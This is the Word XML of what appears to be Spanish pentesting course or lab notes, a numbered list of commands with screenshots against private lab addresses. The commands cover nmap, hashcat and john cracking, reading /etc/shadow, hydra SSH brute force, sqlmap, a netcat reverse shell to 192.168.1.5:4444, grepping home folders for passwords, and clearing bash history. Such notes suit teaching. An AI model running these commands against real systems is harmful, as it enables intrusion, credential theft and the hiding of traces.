        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA2795C" w14:textId="2A653441" w:rsidR="004D7815" w:rsidRPr="00206562" w:rsidRDefault="004D7815" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07927C94" wp14:editId="4E90F7E8">
            <wp:extent cx="5400040" cy="1758950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="81978201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82014" name="Imagen 81978201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7E10D0B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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> --host-timeout 30s 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D775AFF" w14:textId="60F83BC4" w:rsidR="004D7815" w:rsidRPr="00206562" w:rsidRDefault="004D7815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E19BF59" wp14:editId="4EBC8AE0">
            <wp:extent cx="5400040" cy="1932305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="157615205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2059" name="Imagen 15761520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1F83" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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78E274AF" w14:textId="498FD605" w:rsid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  <w:r w:rsidR="00B504B0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E126080" wp14:editId="35B5BC66">
            <wp:extent cx="5400040" cy="1270000"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="150191981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9812" name="Imagen 15019198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24E" w14:textId="77777777" w:rsidR="00B504B0" w:rsidRPr="00206562" w:rsidRDefault="00B504B0" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22A364BF" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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0E6290F4" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:lastRenderedPageBreak/>
        <w:t>john</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> --show hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB7EB1E" w14:textId="02A721CF" w:rsidR="00B504B0" w:rsidRPr="00206562" w:rsidRDefault="00B504B0" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60C8BD77" wp14:editId="1931B6BF">
            <wp:extent cx="5400040" cy="1423035"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="104654175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1753" name="Imagen 104654175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B7E" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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</w:p>
    <w:p w14:paraId="556D0C7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53840F31" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="6CF646D1">
          <v:rect id="_x0000_i1070" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C479C1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44. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Descomprimir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323C47FF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gunzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> rockyou.txt.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA2BE1A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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CEFCC86" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>echo -n "1234" | md5sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26860593" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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0EEAB385" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>echo -n "1234" | sha256sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1FA14E" w14:textId="7E716EEF" w:rsidR="006D3C4D" w:rsidRPr="00206562" w:rsidRDefault="006D3C4D" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B9B50B" wp14:editId="12CBCFF7">
            <wp:extent cx="5400040" cy="1337310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2124377616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77616" name="Imagen 21243776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AE4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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</w:p>
    <w:p w14:paraId="267C8833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hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m 0 hash.txt rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4245C3" w14:textId="0136155A" w:rsidR="006D3C4D" w:rsidRPr="00206562" w:rsidRDefault="006D3C4D" w:rsidP="0020656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2DDBEAB" wp14:editId="4A488B7D">
            <wp:extent cx="5400040" cy="3628390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="495446952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6952" name="Imagen 4954469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53F" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="75420A2E">
          <v:rect id="_x0000_i1074" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4457C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4E79E53" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>hashid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7011CA6E" w14:textId="2770CF4A" w:rsidR="006D3C4D" w:rsidRPr="00206562" w:rsidRDefault="006D3C4D" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DCD1D6E" wp14:editId="0788252F">
            <wp:extent cx="5400040" cy="1734185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2091838901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8901" name="Imagen 209183890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865" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="018D7981">
          <v:rect id="_x0000_i1075" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="676494E7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49. Crear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r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B1566F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useradd</w:t>
      </w:r>
      <w:proofErr w:type="spell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  <w:t>passwd test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2607ECC2" w14:textId="76AE5832" w:rsidR="006D3C4D" w:rsidRPr="00206562" w:rsidRDefault="006D3C4D" w:rsidP="0020656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97A7971" wp14:editId="0D714192">
            <wp:extent cx="5400040" cy="1769745"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1747265049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5049" name="Imagen 174726504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51B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2B7B07D5">
          <v:rect id="_x0000_i1076" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC3F34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50. Ver hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37587E93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shadow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56B46188" w14:textId="07102D8F" w:rsidR="006D3C4D" w:rsidRPr="00206562" w:rsidRDefault="006D3C4D" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12B06B4B" wp14:editId="64E02C26">
            <wp:extent cx="5400040" cy="3538220"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="2082182349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82349" name="Imagen 20821823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571" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r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lastRenderedPageBreak/>
        <w:t xml:space="preserve">(Si quieres, te desarrollo estos con herramientas concretas tipo Hydra,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000000" w:rsidP="00206562">
      <w:r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</w:p>
    <w:p w14:paraId="72017A55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3DD1A7B1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>grep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r w:rsidRPr="00206562">
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t>"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2F1AFE67" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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tunap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B9B533C" w14:textId="0675E22D" w:rsidR="006D3C4D" w:rsidRPr="00206562" w:rsidRDefault="006D3C4D" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7372818E" wp14:editId="0C10C060">
            <wp:extent cx="5400040" cy="2630805"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1021464544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4544" name="Imagen 102146454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823473C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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spell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34CFA632" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:lastRenderedPageBreak/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155D42EF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status</w:t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0926CFC8" w:rsidR="00206562" w:rsidRDefault="00B03D93" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00206562" w:rsidRPr="00206562">
        <w:t>op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A0983B" w14:textId="16436E94" w:rsidR="00B03D93" w:rsidRPr="00206562" w:rsidRDefault="00B03D93" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33F5E1E2" wp14:editId="799D5094">
            <wp:extent cx="5400040" cy="2665095"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1074061315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1315" name="Imagen 107406131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0E44301C" w14:textId="636BD0D1" w:rsidR="00206562" w:rsidRDefault="00B03D93" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00206562" w:rsidRPr="00206562">
        <w:t>top</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="30DC99D0" w14:textId="62BF6980" w:rsidR="00B03D93" w:rsidRPr="00206562" w:rsidRDefault="00B03D93" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="643F3CD9" wp14:editId="3D94791C">
            <wp:extent cx="5400040" cy="1704975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="109012838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8382" name="Imagen 109012838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-A -T4 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4991A0" w14:textId="759A7690" w:rsidR="00B03D93" w:rsidRPr="00206562" w:rsidRDefault="00B03D93" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41C370CB" wp14:editId="4E04A5FB">
            <wp:extent cx="5400040" cy="3101975"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="32962267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2676" name="Imagen 32962267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67721A" w14:textId="58A53185" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> -h </w:t>
      </w:r>
      <w:hyperlink r:id="rId57" w:history="1">
        <w:r w:rsidR="00B03D93" w:rsidRPr="0002231A">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.1.10</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B6AF341" w14:textId="3ABC1781" w:rsidR="00B03D93" w:rsidRPr="00206562" w:rsidRDefault="00B03D93" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CDE7D1D" wp14:editId="4761EA0D">
            <wp:extent cx="5400040" cy="1620520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="112551516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5161" name="Imagen 11255151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77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spell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ssh://192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4256A0E0" w14:textId="48CC7098" w:rsidR="00B03D93" w:rsidRPr="00206562" w:rsidRDefault="00B03D93" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="660841B2" wp14:editId="32EB4F54">
            <wp:extent cx="5400040" cy="2136775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1055413826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13826" name="Imagen 105541382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1D41DE41" w14:textId="1A7D624E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sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u "http://site.com?id=1" </w:t>
      </w:r>
      <w:r w:rsidR="00B03D93">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65AC430B" w14:textId="10C780BC" w:rsidR="00B03D93" w:rsidRPr="00206562" w:rsidRDefault="00B03D93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0A2597A" wp14:editId="08695E3A">
            <wp:extent cx="5400040" cy="2889885"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="77175048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5048" name="Imagen 7717504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154B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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Default="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>dnsenum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> dominio.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BC5F1A" w14:textId="7D08F43A" w:rsidR="009B47B3" w:rsidRPr="00206562" w:rsidRDefault="009B47B3" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B8E4D67" wp14:editId="4E3D2140">
            <wp:extent cx="5400040" cy="1976120"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="79370637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6370" name="Imagen 79370637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495FF62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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e /bin/bash 192.168.1.5 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEB0845" w14:textId="0B80D5B7" w:rsidR="009B47B3" w:rsidRPr="00206562" w:rsidRDefault="009B47B3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8939197" wp14:editId="3FEAB567">
            <wp:extent cx="5400040" cy="1372870"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="747814112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4112" name="Imagen 74781411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3B3D675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3B29785D" w14:textId="074A43E3" w:rsidR="009B47B3" w:rsidRPr="00206562" w:rsidRDefault="009B47B3" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="471B0B58" wp14:editId="5BB4C4A6">
            <wp:extent cx="5400040" cy="1666240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1734904196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4196" name="Imagen 173490419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77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:p>
    <w:p w14:paraId="00023A83" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26043601" w14:textId="1BFFC24E" w:rsidR="00785957" w:rsidRPr="00206562" w:rsidRDefault="00785957" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DCDFB7C" wp14:editId="0CF920F6">
            <wp:extent cx="5400040" cy="1776095"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22089975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9758" name="Imagen 22089975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B151541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</w:p>
    <w:p w14:paraId="60296E9E" w14:textId="0C4D7CE5" w:rsidR="000A55DB" w:rsidRDefault="000A55DB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BD1F22" wp14:editId="2B5D9E13">
            <wp:extent cx="5400040" cy="2609850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="435668482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8482" name="Imagen 43566848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4735" w14:textId="77777777" w:rsidR="001464E5" w:rsidRPr="00206562" w:rsidRDefault="001464E5" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pP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26F5C9F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6E5076C1" w14:textId="3C7EC706" w:rsidR="000A55DB" w:rsidRPr="00206562" w:rsidRDefault="000A55DB" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66A607CB" wp14:editId="7A6E23E9">
            <wp:extent cx="5400040" cy="1882775"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="479329370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9370" name="Imagen 47932937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36D67412" w14:textId="295B0FC5" w:rsidR="000A55DB" w:rsidRPr="00206562" w:rsidRDefault="000A55DB" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2578C332" wp14:editId="241EFE79">
            <wp:extent cx="5400040" cy="1183640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="821102984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2984" name="Imagen 82110298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5429D235" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r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r w:rsidRPr="00206562">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00206562">
        <w:t>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P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7DE24CB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7F7D9108" w14:textId="07136810" w:rsidR="00B76484" w:rsidRPr="00206562" w:rsidRDefault="00B76484" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E8BD23B" wp14:editId="5222E905">
            <wp:extent cx="5400040" cy="3002915"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="961690092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0092" name="Imagen 961690092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44D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r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r w:rsidRPr="00206562">
        <w:t>crontab</w:t>
      </w:r>
      <w:proofErr w:type="spell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37337307" w14:textId="3205E737" w:rsidR="00B76484" w:rsidRPr="00206562" w:rsidRDefault="00B76484" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2783E779" wp14:editId="353CFFB1">
            <wp:extent cx="5400040" cy="2613660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1598288903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8903" name="Imagen 159828890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EB3AAD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5927FD75" w14:textId="402C08A9" w:rsidR="00B76484" w:rsidRPr="00206562" w:rsidRDefault="00B76484" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="745507BE" wp14:editId="133EE118">
            <wp:extent cx="5400040" cy="2973070"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1628130701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30701" name="Imagen 162813070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75CC2848" w14:textId="07BF9A12" w:rsidR="00B76484" w:rsidRPr="00206562" w:rsidRDefault="00B76484" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C864A74" wp14:editId="6A33803F">
            <wp:extent cx="5400040" cy="2089150"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="508878302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78302" name="Imagen 50887830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09C4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000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11906FB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grep -r "password" /home 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1A6F6F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5E6E2D1A" w14:textId="7FD6456C" w:rsidR="00B76484" w:rsidRPr="00206562" w:rsidRDefault="00B76484" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A324694" wp14:editId="64194698">
            <wp:extent cx="5400040" cy="2507615"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1004795589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5589" name="Imagen 100479558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47C549C4" w14:textId="375E49E2" w:rsidR="00760BD9" w:rsidRPr="00206562" w:rsidRDefault="00760BD9" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37452BDC" wp14:editId="62C31631">
            <wp:extent cx="5400040" cy="2243455"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1949943236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43236" name="Imagen 194994323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lastRenderedPageBreak/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history -c</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t>rm -rf ~/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>bash_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1079C8D0" w14:textId="3F04599A" w:rsidR="00760BD9" w:rsidRPr="00206562" w:rsidRDefault="00760BD9" w:rsidP="002065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EE5106" wp14:editId="1D50180E">
            <wp:extent cx="5400040" cy="993775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="95538684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86842" name="Imagen 95538684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944F3"/>
    <w:rsid w:val="000A55DB"/>
    <w:rsid w:val="001464E5"/>
    <w:rsid w:val="00206562"/>
    <w:rsid w:val="002F2CF3"/>
    <w:rsid w:val="004D7815"/>
    <w:rsid w:val="006D3C4D"/>
    <w:rsid w:val="00760BD9"/>
    <w:rsid w:val="0076209E"/>
    <w:rsid w:val="00785957"/>
    <w:rsid w:val="007950B0"/>
    <w:rsid w:val="008E32AF"/>
    <w:rsid w:val="009515CA"/>
    <w:rsid w:val="009B47B3"/>
    <w:rsid w:val="00A42179"/>
    <w:rsid w:val="00B03D93"/>
    <w:rsid w:val="00B504B0"/>
    <w:rsid w:val="00B76484"/>
    <w:rsid w:val="00C67DB1"/>
    <w:rsid w:val="00CB4BCC"/>
    <w:rsid w:val="00CC1CD1"/>
    <w:rsid w:val="00E0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3D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3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http://192.168.1.10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40</Pages>
  <Words>998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2026-03-17T12:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-18T13:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>